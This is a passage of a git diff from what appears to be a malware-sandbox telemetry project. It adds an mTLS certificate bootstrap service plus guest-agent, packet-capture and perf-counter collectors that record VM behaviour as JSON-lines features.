# Drop a TLS leaf from wg-pki at /etc/cis490/certs/, edit /etc/cis490/lab-host.toml.
|
||||
sudo systemctl enable --now cis490-shipper cis490-orchestrator
|
||||
```
|
||||
|
||||
For now both bootstrap scripts are scaffolds; the units and configs they
|
||||
install live in `etc/`. The receiver itself works today
|
||||
(`uv run python -m receiver --config etc/receiver.toml.example` — modify
|
||||
paths).
|
||||
The orchestrator service runs `tools/run_fleet.py --waves 1` per
|
||||
invocation with `Restart=always`, giving a continuous stream of
|
||||
fresh-sample episodes per host. The shipper picks them up as
|
||||
`done.marker` files appear and PUTs them to `https://collector.wg`.
|
||||
|
||||
For mTLS leaf-cert minting: `spectral/wg-pki/scripts/issue-cis490-client-cert.sh <host_id>`.
|
||||
|
||||
</details>
|
||||
|
||||
|
|
|
|||
0
bootstrap/__init__.py
Normal file
0
bootstrap/__init__.py
Normal file
65
bootstrap/__main__.py
Normal file
65
bootstrap/__main__.py
Normal file
|
|
@ -0,0 +1,65 @@
|
|||
"""``cis490-bootstrap`` launcher.
|
||||
|
||||
Runs as root (needs CA private key access). Listens on 127.0.0.1:8446
|
||||
behind Caddy's ``bootstrap.wg`` site — Caddy terminates TLS, this
|
||||
service speaks plain HTTP on loopback only.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import argparse
|
||||
import logging
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
import uvicorn
|
||||
|
||||
from bootstrap.app import make_app
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
p = argparse.ArgumentParser(prog="cis490-bootstrap")
|
||||
p.add_argument("--listen-host", default="127.0.0.1")
|
||||
p.add_argument("--listen-port", type=int, default=8446)
|
||||
p.add_argument(
|
||||
"--issuer-script",
|
||||
type=Path,
|
||||
default=Path("/home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh"),
|
||||
help="Path to the wg-pki leaf-cert mint script.",
|
||||
)
|
||||
p.add_argument(
|
||||
"--issued-root",
|
||||
type=Path,
|
||||
default=Path("/home/max/.env/wg-pki/issued"),
|
||||
help="Where minted tarballs are cached.",
|
||||
)
|
||||
p.add_argument("--log-level", default="info")
|
||||
args = p.parse_args(argv)
|
||||
|
||||
logging.basicConfig(
|
||||
level=getattr(logging, args.log_level.upper(), logging.INFO),
|
||||
format="%(asctime)s %(levelname)s %(name)s %(message)s",
|
||||
)
|
||||
log = logging.getLogger("cis490.bootstrap.main")
|
||||
|
||||
if not args.issuer_script.exists():
|
||||
log.error("issuer script missing: %s", args.issuer_script)
|
||||
return 2
|
||||
|
||||
app = make_app(
|
||||
issuer_script=args.issuer_script,
|
||||
issued_root=args.issued_root,
|
||||
)
|
||||
log.info("listening on %s:%d", args.listen_host, args.listen_port)
|
||||
uvicorn.run(
|
||||
app,
|
||||
host=args.listen_host,
|
||||
port=args.listen_port,
|
||||
log_level=args.log_level,
|
||||
access_log=True,
|
||||
)
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
146
bootstrap/app.py
Normal file
146
bootstrap/app.py
Normal file
|
|
@ -0,0 +1,146 @@
|
|||
"""``cis490-bootstrap`` — auto-issue mTLS leaf certs to enrolled lab hosts.
|
||||
|
||||
This is the chicken-and-egg fix for first-time lab-host setup. A
|
||||
freshly wg-enrolled device has WG access (and trusts the wg-pki CA)
|
||||
but has no client cert yet, so it can't authenticate to the
|
||||
mTLS-protected ``collector.wg``. This service exposes a *plain-TLS*
|
||||
(no client-auth) endpoint that the lab host can call once during
|
||||
``install-lab-host.sh`` to retrieve its leaf cert tarball.
|
||||
|
||||
Trust boundary: anything that reaches ``bootstrap.wg`` has already
|
||||
passed iptmonads' WG-membership check at L4. No further
|
||||
authentication is required for the bootstrap pull — by the time a
|
||||
caller can connect at all they're a peer the operator authorized.
|
||||
|
||||
The privilege boundary, on the other hand, is real: minting certs
|
||||
requires the wg-pki CA private key (root-only at
|
||||
``/var/lib/wg-pki/cis490-client-ca/ca.key``). This service therefore
|
||||
runs as root in a tight sandbox (see ``etc/cis490-bootstrap.service``)
|
||||
and shells out to ``issue-cis490-client-cert.sh`` for each mint.
|
||||
|
||||
Endpoints:
|
||||
|
||||
GET /v1/cert/{host_id} — return tarball of {ca.crt, leaf.pem, leaf.key}
|
||||
for ``host_id``. Cached — successive calls
|
||||
return the same bytes.
|
||||
GET /v1/health — liveness probe (no auth needed).
|
||||
|
||||
Each mint is logged with the source IP (after Caddy's X-Real-IP
|
||||
forward) so the operator has an audit trail of which devices have
|
||||
fetched which certs.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import logging
|
||||
import re
|
||||
import subprocess
|
||||
import time
|
||||
from pathlib import Path
|
||||
from typing import Awaitable, Callable
|
||||
|
||||
from starlette.applications import Starlette
|
||||
from starlette.requests import Request
|
||||
from starlette.responses import FileResponse, JSONResponse, Response
|
||||
from starlette.routing import Route
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.bootstrap")
|
||||
|
||||
|
||||
# Sane host_id charset — same rules the receiver enforces, mirrored
|
||||
# here so mint requests can't smuggle path traversal in.
|
||||
_HOST_ID_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")
|
||||
|
||||
|
||||
def _is_valid_host_id(s: str) -> bool:
|
||||
return bool(_HOST_ID_RE.match(s))
|
||||
|
||||
|
||||
def make_app(
|
||||
*,
|
||||
issuer_script: Path,
|
||||
issued_root: Path,
|
||||
rate_limit_window_s: float = 5.0,
|
||||
) -> Starlette:
|
||||
"""Build the Starlette app. Wired by the production launcher in
|
||||
``bootstrap/__main__.py``; tests can pass synthetic paths."""
|
||||
issued_root.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
# Coarse per-IP rate limiter to make a casual scan annoying. Not
|
||||
# a real defense — the WG mesh is the actual perimeter.
|
||||
last_request: dict[str, float] = {}
|
||||
|
||||
async def health(request: Request) -> Response:
|
||||
return JSONResponse({"status": "ok"})
|
||||
|
||||
async def get_cert(request: Request) -> Response:
|
||||
host_id: str = request.path_params["host_id"]
|
||||
if not _is_valid_host_id(host_id):
|
||||
return JSONResponse({"error": "bad host_id"}, status_code=400)
|
||||
|
||||
# Caddy forwards the original WG-side IP via X-Real-IP /
|
||||
# X-Forwarded-For; fall back to the direct peer if running
|
||||
# without Caddy in front (tests).
|
||||
src = (
|
||||
request.headers.get("x-real-ip")
|
||||
or (request.headers.get("x-forwarded-for") or "").split(",")[0].strip()
|
||||
or (request.client.host if request.client else "?")
|
||||
)
|
||||
|
||||
now = time.monotonic()
|
||||
prev = last_request.get(src, 0.0)
|
||||
if (now - prev) < rate_limit_window_s:
|
||||
return JSONResponse(
|
||||
{"error": "rate limited; back off"},
|
||||
status_code=429,
|
||||
)
|
||||
last_request[src] = now
|
||||
|
||||
tar_path = issued_root / host_id / f"{host_id}.tar"
|
||||
if not tar_path.exists():
|
||||
log.info("minting cert for host_id=%s src=%s", host_id, src)
|
||||
try:
|
||||
subprocess.run(
|
||||
[
|
||||
str(issuer_script), host_id,
|
||||
"--out-dir", str(issued_root / host_id),
|
||||
],
|
||||
check=True,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
timeout=30,
|
||||
)
|
||||
except subprocess.CalledProcessError as e:
|
||||
log.error("issue script failed for %s: rc=%d stderr=%s",
|
||||
host_id, e.returncode, e.stderr[:500])
|
||||
return JSONResponse(
|
||||
{"error": "mint failed", "detail": e.stderr[:500]},
|
||||
status_code=500,
|
||||
)
|
||||
except (OSError, subprocess.TimeoutExpired) as e:
|
||||
log.exception("issue script transport error for %s", host_id)
|
||||
return JSONResponse(
|
||||
{"error": f"transport: {e}"},
|
||||
status_code=500,
|
||||
)
|
||||
else:
|
||||
log.info("cache hit for host_id=%s src=%s", host_id, src)
|
||||
|
||||
if not tar_path.exists():
|
||||
return JSONResponse({"error": "tarball not produced"}, status_code=500)
|
||||
return FileResponse(
|
||||
tar_path,
|
||||
media_type="application/x-tar",
|
||||
filename=f"{host_id}.tar",
|
||||
headers={
|
||||
"X-Cis490-Host-Id": host_id,
|
||||
"X-Cis490-Cert-Source-IP": src,
|
||||
},
|
||||
)
|
||||
|
||||
routes = [
|
||||
Route("/v1/health", health, methods=["GET"]),
|
||||
Route("/v1/cert/{host_id}", get_cert, methods=["GET"]),
|
||||
]
|
||||
return Starlette(routes=routes)
|
||||
119
collectors/guest_agent.py
Normal file
119
collectors/guest_agent.py
Normal file
|
|
@ -0,0 +1,119 @@
|
|||
"""Source 5 (feature, deployable): in-guest agent reader.
|
||||
|
||||
QEMU exposes a virtio-serial channel two ways:
|
||||
- inside the guest: ``/dev/virtio-ports/cis490.guest.agent``
|
||||
- on the host: a unix socket at ``$RUN_DIR/agent.sock``
|
||||
|
||||
The in-guest agent (`vm/guest-agent/cis490_agent.py`) writes one
|
||||
JSON-lines row per tick into the guest-side device. Bytes traverse the
|
||||
virtio bus and surface on the host socket. This collector reads them,
|
||||
re-stamps with the host's monotonic clock (so rows align with all
|
||||
other telemetry on a single timeline), and persists to
|
||||
``telemetry-guest.jsonl``.
|
||||
|
||||
Why re-stamp? The agent's clock is the *guest* clock, which can drift
|
||||
from the host (rare in KVM, but happens during live-migration tests
|
||||
and on heavy host load). The original guest timestamps stay in the row
|
||||
under ``t_guest_*`` so analysts can quantify drift if they care.
|
||||
|
||||
This source is the **deployable** side: every row is tagged
|
||||
``available_in_deployment: true``. See docs/threat-model.md.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import socket
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.collectors.guest_agent")
|
||||
|
||||
SOURCE = "guest_agent"
|
||||
AVAILABLE_IN_DEPLOYMENT = True
|
||||
|
||||
|
||||
def _connect(socket_path: Path, timeout_s: float) -> socket.socket | None:
|
||||
deadline = time.monotonic() + timeout_s
|
||||
last_err: OSError | None = None
|
||||
while time.monotonic() < deadline:
|
||||
try:
|
||||
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
|
||||
s.settimeout(2.0)
|
||||
s.connect(str(socket_path))
|
||||
return s
|
||||
except OSError as e:
|
||||
last_err = e
|
||||
time.sleep(0.5)
|
||||
if last_err is not None:
|
||||
log.warning("guest-agent socket %s never came up: %s", socket_path, last_err)
|
||||
return None
|
||||
|
||||
|
||||
def _stamp(row: dict, t_mono_origin_ns: int) -> dict:
|
||||
"""Replace the agent's wall-only timestamps with host-clock ones,
|
||||
keeping the originals under ``t_guest_*`` for drift analysis."""
|
||||
out = dict(row)
|
||||
out.setdefault("t_guest_mono_ns", row.get("t_guest_mono_ns"))
|
||||
out.setdefault("t_guest_wall_ns", row.get("t_guest_wall_ns"))
|
||||
out["t_mono_ns"] = time.monotonic_ns() - t_mono_origin_ns
|
||||
out["t_wall_ns"] = time.time_ns()
|
||||
out.setdefault("source", SOURCE)
|
||||
out.setdefault("available_in_deployment", AVAILABLE_IN_DEPLOYMENT)
|
||||
return out
|
||||
|
||||
|
||||
def run_loop(
|
||||
socket_path: str | Path,
|
||||
output_path: Path,
|
||||
t_mono_origin_ns: int,
|
||||
stop_event: threading.Event,
|
||||
*,
|
||||
connect_timeout_s: float = 30.0,
|
||||
) -> int:
|
||||
"""Read agent JSON-lines from the host-side virtio-serial unix
|
||||
socket. Re-stamp each row with the host clock and persist."""
|
||||
sock_path = Path(socket_path)
|
||||
sock = _connect(sock_path, connect_timeout_s)
|
||||
if sock is None:
|
||||
return 0
|
||||
|
||||
rows = 0
|
||||
output_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
buf = b""
|
||||
try:
|
||||
with output_path.open("a", buffering=1) as f:
|
||||
while not stop_event.is_set():
|
||||
try:
|
||||
sock.settimeout(0.5)
|
||||
chunk = sock.recv(8192)
|
||||
except socket.timeout:
|
||||
continue
|
||||
except OSError as e:
|
||||
log.warning("guest-agent recv failed: %s", e)
|
||||
break
|
||||
if not chunk:
|
||||
log.info("guest-agent socket closed")
|
||||
break
|
||||
buf += chunk
|
||||
while b"\n" in buf:
|
||||
line, _, buf = buf.partition(b"\n")
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
try:
|
||||
row = json.loads(line)
|
||||
except json.JSONDecodeError as e:
|
||||
log.warning("dropping malformed guest-agent line: %s", e)
|
||||
continue
|
||||
f.write(json.dumps(_stamp(row, t_mono_origin_ns)) + "\n")
|
||||
rows += 1
|
||||
finally:
|
||||
try:
|
||||
sock.close()
|
||||
except OSError:
|
||||
pass
|
||||
return rows
|
||||
288
collectors/pcap.py
Normal file
288
collectors/pcap.py
Normal file
|
|
@ -0,0 +1,288 @@
|
|||
"""Source 4 (feature, deployable): bridge-side pcap + bucketed netflow.
|
||||
|
||||
Captures packets on the host-only ``br-malware`` bridge during an
|
||||
episode, writes the raw pcap, and produces a bucketed JSONL file the
|
||||
trainer can consume directly.
|
||||
|
||||
The capture is **gateway-side** — the orchestrator sees the same
|
||||
packets a real upstream router/gateway would see in deployment, so
|
||||
features derived here transfer 1:1 to the deployment-time gateway
|
||||
observer.
|
||||
|
||||
Implementation:
|
||||
|
||||
- ``run_capture()`` spawns ``tcpdump -i <bridge> -U -w <out.pcap>``
|
||||
as a subprocess for the episode duration. ``-U`` flushes per
|
||||
packet so the file is consumable mid-flight.
|
||||
|
||||
- ``bucketize()`` reads a finished pcap and emits 100 ms-bucketed
|
||||
rows into ``netflow.jsonl``. Pure-Python pcap parser (no scapy /
|
||||
dpkt dependency); decodes Ethernet + IPv4 + TCP/UDP enough to fill
|
||||
the schema in docs/data-model.md.
|
||||
|
||||
The pure-Python parser is intentionally minimal — it does NOT do
|
||||
fragment reassembly, IPv6, VLAN tags, or anything fancy. It handles
|
||||
the cases that occur on a host-only bridge for malware behaviour:
|
||||
plain Ethernet II, IPv4, TCP/UDP. Other frames are still counted at
|
||||
the byte/packet level but skipped for protocol-specific stats.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import os
|
||||
import struct
|
||||
import subprocess
|
||||
import threading
|
||||
import time
|
||||
from collections import defaultdict
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.collectors.pcap")
|
||||
|
||||
SOURCE = "bridge_pcap"
|
||||
AVAILABLE_IN_DEPLOYMENT = True
|
||||
|
||||
# Pcap file-level header
|
||||
_PCAP_GLOBAL_HDR = "<IHHiIII"
|
||||
_PCAP_GLOBAL_HDR_SIZE = 24
|
||||
_PCAP_REC_HDR = "<IIII"
|
||||
_PCAP_REC_HDR_SIZE = 16
|
||||
_PCAP_MAGIC_USEC = 0xa1b2c3d4
|
||||
_PCAP_MAGIC_NSEC = 0xa1b23c4d # nanosecond resolution variant
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Capture
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@dataclass
|
||||
class CaptureHandle:
|
||||
proc: subprocess.Popen
|
||||
pcap_path: Path
|
||||
bridge: str
|
||||
started_mono_ns: int
|
||||
|
||||
|
||||
def run_capture(
|
||||
*,
|
||||
bridge: str,
|
||||
pcap_path: Path,
|
||||
snaplen: int = 256,
|
||||
bpf: str | None = None,
|
||||
) -> CaptureHandle:
|
||||
"""Start a tcpdump capture on ``bridge``. Returns a handle the
|
||||
caller stops via ``stop_capture()``."""
|
||||
pcap_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
args = ["tcpdump", "-i", bridge, "-U", "-s", str(snaplen), "-w", str(pcap_path)]
|
||||
if bpf:
|
||||
args.append(bpf)
|
||||
log.info("starting pcap: %s", " ".join(args))
|
||||
proc = subprocess.Popen(
|
||||
args,
|
||||
stdout=subprocess.DEVNULL,
|
||||
stderr=subprocess.PIPE,
|
||||
# tcpdump may need root or CAP_NET_RAW. We don't elevate here.
|
||||
)
|
||||
return CaptureHandle(
|
||||
proc=proc, pcap_path=pcap_path, bridge=bridge,
|
||||
started_mono_ns=time.monotonic_ns(),
|
||||
)
|
||||
|
||||
|
||||
def stop_capture(handle: CaptureHandle, *, timeout_s: float = 5.0) -> int:
|
||||
"""SIGINT tcpdump (the Right Signal — flushes buffers + exits 0).
|
||||
Returns the process exit code."""
|
||||
proc = handle.proc
|
||||
if proc.poll() is None:
|
||||
proc.send_signal(2) # SIGINT
|
||||
try:
|
||||
proc.wait(timeout=timeout_s)
|
||||
except subprocess.TimeoutExpired:
|
||||
proc.kill()
|
||||
proc.wait(timeout=timeout_s)
|
||||
return proc.returncode
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Pure-Python pcap parser
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _iter_pcap(path: Path):
|
||||
"""Yield ``(t_pkt_ns, frame_bytes)`` for every record in a pcap
|
||||
file. Tolerates either microsecond or nanosecond magics."""
|
||||
with path.open("rb") as f:
|
||||
hdr = f.read(_PCAP_GLOBAL_HDR_SIZE)
|
||||
if len(hdr) < _PCAP_GLOBAL_HDR_SIZE:
|
||||
return
|
||||
magic = struct.unpack("<I", hdr[:4])[0]
|
||||
if magic == _PCAP_MAGIC_USEC:
|
||||
sub_mult = 1000 # us → ns
|
||||
elif magic == _PCAP_MAGIC_NSEC:
|
||||
sub_mult = 1
|
||||
else:
|
||||
log.warning("unknown pcap magic %#x in %s", magic, path)
|
||||
return
|
||||
while True:
|
||||
rec = f.read(_PCAP_REC_HDR_SIZE)
|
||||
if len(rec) < _PCAP_REC_HDR_SIZE:
|
||||
return
|
||||
ts_sec, ts_sub, caplen, _ = struct.unpack(_PCAP_REC_HDR, rec)
|
||||
data = f.read(caplen)
|
||||
if len(data) < caplen:
|
||||
return
|
||||
t_ns = ts_sec * 1_000_000_000 + ts_sub * sub_mult
|
||||
yield t_ns, data
|
||||
|
||||
|
||||
def _decode(frame: bytes) -> dict:
|
||||
"""Decode an Ethernet/IPv4/{TCP,UDP} frame to a flat dict. Unknown
|
||||
protocols return only the ethertype + lengths."""
|
||||
out: dict = {"size": len(frame)}
|
||||
if len(frame) < 14:
|
||||
return out
|
||||
ethertype = struct.unpack(">H", frame[12:14])[0]
|
||||
out["ethertype"] = ethertype
|
||||
if ethertype != 0x0800: # not IPv4 — count, don't decode further
|
||||
return out
|
||||
ip = frame[14:]
|
||||
if len(ip) < 20:
|
||||
return out
|
||||
ihl = (ip[0] & 0x0F) * 4
|
||||
if ihl < 20 or len(ip) < ihl:
|
||||
return out
|
||||
proto = ip[9]
|
||||
src = ip[12:16]
|
||||
dst = ip[16:20]
|
||||
out["ip_proto"] = proto
|
||||
out["src_ip"] = ".".join(str(b) for b in src)
|
||||
out["dst_ip"] = ".".join(str(b) for b in dst)
|
||||
payload = ip[ihl:]
|
||||
if proto == 6 and len(payload) >= 20: # TCP
|
||||
sport, dport, _, _, off_flags = struct.unpack(">HHIIH", payload[:14])
|
||||
flags = off_flags & 0x003F
|
||||
out["src_port"] = sport
|
||||
out["dst_port"] = dport
|
||||
out["tcp_flags"] = flags # FIN=1 SYN=2 RST=4 PSH=8 ACK=16 URG=32
|
||||
elif proto == 17 and len(payload) >= 8: # UDP
|
||||
sport, dport, _, _ = struct.unpack(">HHHH", payload[:8])
|
||||
out["src_port"] = sport
|
||||
out["dst_port"] = dport
|
||||
return out
|
||||
|
||||
|
||||
def bucketize(
|
||||
pcap_path: Path,
|
||||
netflow_path: Path,
|
||||
*,
|
||||
bucket_ms: int = 100,
|
||||
t_mono_origin_ns: int = 0,
|
||||
bridge_ip: str = "10.200.0.1",
|
||||
) -> int:
|
||||
"""Read a pcap and emit one row per ``bucket_ms`` window into
|
||||
``netflow.jsonl``. The ``in/out`` direction is from the bridge
|
||||
perspective (host = ``bridge_ip``):
|
||||
|
||||
out = packet whose src is the host-side address (host → guest)
|
||||
in = anything else seen on the bridge (guest → host or
|
||||
guest-to-guest)
|
||||
|
||||
Returns the number of rows written."""
|
||||
if not pcap_path.exists():
|
||||
return 0
|
||||
bucket_ns = bucket_ms * 1_000_000
|
||||
netflow_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
|
||||
rows = 0
|
||||
bucket_start: int | None = None
|
||||
agg: dict = _empty_bucket()
|
||||
with netflow_path.open("a", buffering=1) as out:
|
||||
for t_pkt_ns, frame in _iter_pcap(pcap_path):
|
||||
d = _decode(frame)
|
||||
# Establish first bucket origin on first packet.
|
||||
if bucket_start is None:
|
||||
bucket_start = t_pkt_ns - (t_pkt_ns % bucket_ns)
|
||||
while t_pkt_ns >= bucket_start + bucket_ns:
|
||||
_flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
|
||||
rows += 1
|
||||
agg = _empty_bucket()
|
||||
bucket_start += bucket_ns
|
||||
_accumulate(agg, d, bridge_ip)
|
||||
if bucket_start is not None and any(v for v in agg.values() if v):
|
||||
_flush(out, agg, bucket_start, bucket_ns, t_mono_origin_ns)
|
||||
rows += 1
|
||||
return rows
|
||||
|
||||
|
||||
def _empty_bucket() -> dict:
|
||||
return {
|
||||
"pkts_in": 0, "pkts_out": 0,
|
||||
"bytes_in": 0, "bytes_out": 0,
|
||||
"syn_count": 0, "fin_count": 0, "rst_count": 0,
|
||||
"udp_count": 0, "tcp_count": 0,
|
||||
"dns_query_count": 0,
|
||||
"dst_ips": set(), "dst_ports": set(),
|
||||
"tcp_new_flows": 0,
|
||||
}
|
||||
|
||||
|
||||
def _accumulate(agg: dict, d: dict, bridge_ip: str) -> None:
|
||||
sz = d.get("size", 0)
|
||||
is_out = d.get("src_ip") == bridge_ip
|
||||
if is_out:
|
||||
agg["pkts_out"] += 1
|
||||
agg["bytes_out"] += sz
|
||||
else:
|
||||
agg["pkts_in"] += 1
|
||||
agg["bytes_in"] += sz
|
||||
|
||||
proto = d.get("ip_proto")
|
||||
if proto == 6:
|
||||
agg["tcp_count"] += 1
|
||||
flags = d.get("tcp_flags", 0)
|
||||
if flags & 0x02: # SYN
|
||||
agg["syn_count"] += 1
|
||||
if not (flags & 0x10): # SYN without ACK = new flow
|
||||
agg["tcp_new_flows"] += 1
|
||||
if flags & 0x01:
|
||||
agg["fin_count"] += 1
|
||||
if flags & 0x04:
|
||||
agg["rst_count"] += 1
|
||||
elif proto == 17:
|
||||
agg["udp_count"] += 1
|
||||
if d.get("dst_port") == 53:
|
||||
agg["dns_query_count"] += 1
|
||||
|
||||
dst = d.get("dst_ip")
|
||||
if dst:
|
||||
agg["dst_ips"].add(dst)
|
||||
dport = d.get("dst_port")
|
||||
if dport is not None:
|
||||
agg["dst_ports"].add(dport)
|
||||
|
||||
|
||||
def _flush(out, agg: dict, bucket_start_ns: int, bucket_ns: int, t_mono_origin_ns: int) -> None:
|
||||
row = {
|
||||
"t_mono_ns": bucket_start_ns - t_mono_origin_ns,
|
||||
"t_wall_ns": bucket_start_ns,
|
||||
"source": SOURCE,
|
||||
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
|
||||
"bucket_ms": bucket_ns // 1_000_000,
|
||||
"pkts_in": agg["pkts_in"], "pkts_out": agg["pkts_out"],
|
||||
"bytes_in": agg["bytes_in"], "bytes_out": agg["bytes_out"],
|
||||
"syn_count": agg["syn_count"],
|
||||
"fin_count": agg["fin_count"],
|
||||
"rst_count": agg["rst_count"],
|
||||
"udp_count": agg["udp_count"],
|
||||
"tcp_count": agg["tcp_count"],
|
||||
"dns_query_count": agg["dns_query_count"],
|
||||
"unique_dst_ips": len(agg["dst_ips"]),
|
||||
"unique_dst_ports": len(agg["dst_ports"]),
|
||||
"tcp_new_flows": agg["tcp_new_flows"],
|
||||
}
|
||||
out.write(json.dumps(row) + "\n")
|
||||
201
collectors/perf_qemu.py
Normal file
201
collectors/perf_qemu.py
Normal file
|
|
@ -0,0 +1,201 @@
|
|||
"""Source 3 (oracle): ``perf stat -p <qemu_pid>`` sampler.
|
||||
|
||||
Spawns ``perf stat`` in interval-JSON mode against the qemu pid and
|
||||
aggregates the per-event counter values into per-interval telemetry
|
||||
rows. Unlike the /proc and QMP collectors, perf needs CAP_SYS_ADMIN
|
||||
or ``kernel.perf_event_paranoid <= 1`` to read counters for a process
|
||||
the collector doesn't own — typically true on a lab host running
|
||||
QEMU under the cis490 service user.
|
||||
|
||||
Source 3 is **oracle-only** — perf counters are not available on a
|
||||
deployed device. Every row carries ``available_in_deployment: false``.
|
||||
|
||||
The events we ask for are the small canonical set named in
|
||||
docs/data-model.md:
|
||||
|
||||
cycles, instructions, cache-references, cache-misses,
|
||||
branches, branch-misses, page-faults, context-switches
|
||||
|
||||
Anything perf can't enable on the host (e.g. cache-misses without
|
||||
hardware support) is silently dropped from the row.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import logging
|
||||
import shutil
|
||||
import subprocess
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
log = logging.getLogger("cis490.collectors.perf_qemu")
|
||||
|
||||
SOURCE = "host_perf"
|
||||
AVAILABLE_IN_DEPLOYMENT = False
|
||||
|
||||
DEFAULT_EVENTS = (
|
||||
"cycles",
|
||||
"instructions",
|
||||
"cache-references",
|
||||
"cache-misses",
|
||||
"branches",
|
||||
"branch-misses",
|
||||
"page-faults",
|
||||
"context-switches",
|
||||
)
|
||||
|
||||
|
||||
def perf_available() -> bool:
|
||||
return shutil.which("perf") is not None
|
||||
|
||||
|
||||
def _coerce_int(s: str | int | None) -> int | None:
|
||||
if s is None:
|
||||
return None
|
||||
if isinstance(s, int):
|
||||
return s
|
||||
s = s.strip()
|
||||
if not s or s in ("<not counted>", "<not supported>"):
|
||||
return None
|
||||
# perf prints comma-separated thousands by default; we asked -j so
|
||||
# we usually get plain numbers, but guard for both shapes.
|
||||
s = s.replace(",", "")
|
||||
try:
|
||||
return int(s)
|
||||
except ValueError:
|
||||
try:
|
||||
return int(float(s))
|
||||
except ValueError:
|
||||
return None
|
||||
|
||||
|
||||
def _build_row(t_mono_origin_ns: int, interval_s: float, agg: dict[str, int]) -> dict:
|
||||
cycles = agg.get("cycles")
|
||||
insns = agg.get("instructions")
|
||||
cache_refs = agg.get("cache-references")
|
||||
cache_miss = agg.get("cache-misses")
|
||||
ipc = (insns / cycles) if (cycles and insns) else None
|
||||
miss_rate = (cache_miss / cache_refs) if (cache_refs and cache_miss is not None) else None
|
||||
|
||||
return {
|
||||
"t_mono_ns": time.monotonic_ns() - t_mono_origin_ns,
|
||||
"t_wall_ns": time.time_ns(),
|
||||
"source": SOURCE,
|
||||
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
|
||||
"interval_s": interval_s,
|
||||
"cycles": cycles,
|
||||
"instructions": insns,
|
||||
"cache_references": cache_refs,
|
||||
"cache_misses": cache_miss,
|
||||
"branches": agg.get("branches"),
|
||||
"branch_misses": agg.get("branch-misses"),
|
||||
"page_faults": agg.get("page-faults"),
|
||||
"context_switches": agg.get("context-switches"),
|
||||
"ipc": ipc,
|
||||
"cache_miss_rate": miss_rate,
|
||||
}
|
||||
|
||||
|
||||
def parse_perf_event_line(line: str) -> dict | None:
|
||||
"""Parse one ``perf stat -j`` event line. Returns None for blanks
|
||||
or status messages perf occasionally interleaves on stderr-ish
|
||||
paths but stdout-on-error in practice."""
|
||||
line = line.strip()
|
||||
if not line.startswith("{"):
|
||||
return None
|
||||
try:
|
||||
return json.loads(line)
|
||||
except json.JSONDecodeError:
|
||||
return None
|
||||
|
||||
|
||||
def run_loop(
|
||||
pid: int,
|
||||
output_path: Path,
|
||||
t_mono_origin_ns: int,
|
||||
interval_ms: int,
|
||||
stop_event: threading.Event,
|
||||
*,
|
||||
events: tuple[str, ...] = DEFAULT_EVENTS,
|
||||
) -> int:
|
||||
"""Spawn perf stat -j against ``pid`` and stream rows until stop.
|
||||
Returns the number of rows written."""
|
||||
if not perf_available():
|
||||
log.warning("perf binary not on PATH — perf collector disabled")
|
||||
return 0
|
||||
|
||||
cmd = [
|
||||
"perf", "stat",
|
||||
"-p", str(pid),
|
||||
"-I", str(interval_ms),
|
||||
"-j",
|
||||
"-e", ",".join(events),
|
||||
]
|
||||
log.info("starting perf: %s", " ".join(cmd))
|
||||
|
||||
try:
|
||||
proc = subprocess.Popen(
|
||||
cmd,
|
||||
stdout=subprocess.PIPE,
|
||||
stderr=subprocess.PIPE,
|
||||
bufsize=1,
|
||||
text=True,
|
||||
)
|
||||
except (FileNotFoundError, PermissionError) as e:
|
||||
log.warning("perf launch failed: %s", e)
|
||||
return 0
|
||||
|
||||
rows = 0
|
||||
output_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
cur_interval: float | None = None
|
||||
agg: dict[str, int] = {}
|
||||
|
||||
def _flush() -> None:
|
||||
nonlocal rows
|
||||
if cur_interval is None or not agg:
|
||||
return
|
||||
row = _build_row(t_mono_origin_ns, cur_interval, agg)
|
||||
out_f.write(json.dumps(row) + "\n")
|
||||
rows += 1
|
||||
|
||||
try:
|
||||
with output_path.open("a", buffering=1) as out_f:
|
||||
# perf interleaves events and writes to stdout in -j mode.
|
||||
# We read line by line until the process exits (which
|
||||
# happens when we kill it on stop, or when the target pid
|
||||
# disappears and perf's internal -p polling notices).
|
||||
assert proc.stdout is not None
|
||||
for line in proc.stdout:
|
||||
if stop_event.is_set():
|
||||
break
|
||||
evt = parse_perf_event_line(line)
|
||||
if evt is None:
|
||||
continue
|
||||
interval = evt.get("interval")
|
||||
event_name = evt.get("event")
|
||||
value = _coerce_int(evt.get("counter-value"))
|
||||
if interval is None or event_name is None:
|
||||
continue
|
||||
# perf emits one JSON per (event, interval); a new
|
||||
# interval value means we should flush the previous row.
|
||||
